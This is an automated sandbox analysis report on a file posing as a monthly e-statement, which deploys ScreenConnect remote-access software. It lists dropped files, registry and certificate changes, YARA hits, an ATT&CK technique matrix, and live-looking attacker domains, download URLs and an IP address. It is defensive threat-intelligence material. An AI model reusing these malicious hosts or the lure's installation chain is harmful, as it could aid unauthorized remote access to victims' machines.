                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC463642 CreateNamedPipeW,10_2_00007FFAAC463642
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F21806
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeCode function: 9_2_014E4C64 RtlGetVersion,9_2_014E4C64
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 7.0.ScreenConnect.WindowsClient.exe.e10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 2628, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7440, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory1
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  2
                  Windows Service
                  2
                  Windows Service
                  1
                  Install Root Certificate
                  Security Account Manager35
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job
                  13
                  Process Injection
                  1
                  Timestomp
                  NTDS51
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit
                  1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking
                  Cached Domain Credentials51
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551950 Sample: monthly-eStatementForum1204... Startdate: 08/11/2024 Architecture: WINDOWS Score: 51 44 voicemail-lakeleft.top 2->44 46 time.windows.com 2->46 48 4 other IPs or domains 2->48 58 .NET source code references suspicious native API functions 2->58 60 Detected potential unwanted application 2->60 62 Contains functionality to hide user accounts 2->62 64 AI detected suspicious sample 2->64 9 monthly-eStatementForum120478962.Client.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2 4 2->11         started        14 svchost.exe 1 1 2->14         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 19 dfsvc.exe 127 107 9->19         started        23 WerFault.exe 9->23         started        68 Reads the Security eventlog 11->68 70 Reads the System eventlog 11->70 25 ScreenConnect.WindowsClient.exe 11->25         started        52 127.0.0.1 unknown unknown 14->52 28 WerFault.exe 17->28         started        signatures6 process7 dnsIp8 50 popwee2.zapto.org 194.59.30.201, 443, 49706, 49708 COMBAHTONcombahtonGmbHDE Germany 19->50 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 42 13 other files (none is malicious) 19->42 dropped 30 ScreenConnect.WindowsClient.exe 19 10 19->30         started        66 Contains functionality to hide user accounts 25->66 file9 signatures10 process11 signatures12 72 Contains functionality to hide user accounts 30->72 33 ScreenConnect.ClientService.exe 1 3 30->33         started        process13 signatures14 54 Contains functionality to hide user accounts 33->54 56 Enables network access during safeboot for specific services 33->56

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dllPx0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileMa0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe&0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config.0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exx0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree00%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application.6ZZfsA0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationx0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree0%Avira URL Cloudsafe
                  https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config_0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  voicemail-lakeleft.top
                  194.59.30.201
                  truefalse
                    unknown
                    bg.microsoft.map.fastly.net
                    199.232.210.172
                    truefalse
                      high
                      popwee2.zapto.org
                      194.59.30.201
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          high
                          time.windows.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dllfalse
                              high
                              https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dllfalse
                                high
                                https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                  high
                                  https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dllfalse
                                    high
                                    https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                                      high
                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exefalse
                                        high
                                        https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifestfalse
                                          high
                                          https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                            high
                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exefalse
                                              high
                                              https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                                                high
                                                https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exefalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfYsvchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdCsvchost.exe, 0000000E.00000003.1718011909.000002094ED52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&ScreenConnect.WindowsClient.exe, 00000007.00000002.1570346922.000000001BAF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://Passport.NET/tbAsvchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuresvchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zaptS0AMH0XA.log.1.drfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 0000000E.00000002.3157558612.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837600169.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857195324.000002094ED08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874189629.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914239278.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890698251.000002094ED09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945681014.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890597917.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1912708788.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1929278264.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857088725.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914178618.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874058215.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837663842.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837784115.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945445109.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914301366.000002094ED0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdTzsvchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsTzsvchost.exe, 0000000E.00000003.1912726200.000002094ED6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientSerdfsvc.exe, 00000001.00000002.3157733053.000001E8B41CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://voicemail-lakeleft.top/Bin/ScreenConnect.Cdfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 0000000E.00000003.1856885795.000002094ED29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 0000000E.00000002.3157851927.000002094ED5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874035484.000002094ED7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.3157733053.000001E8B3C9A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.3158058619.00000000017D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914328789.000002094ED78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
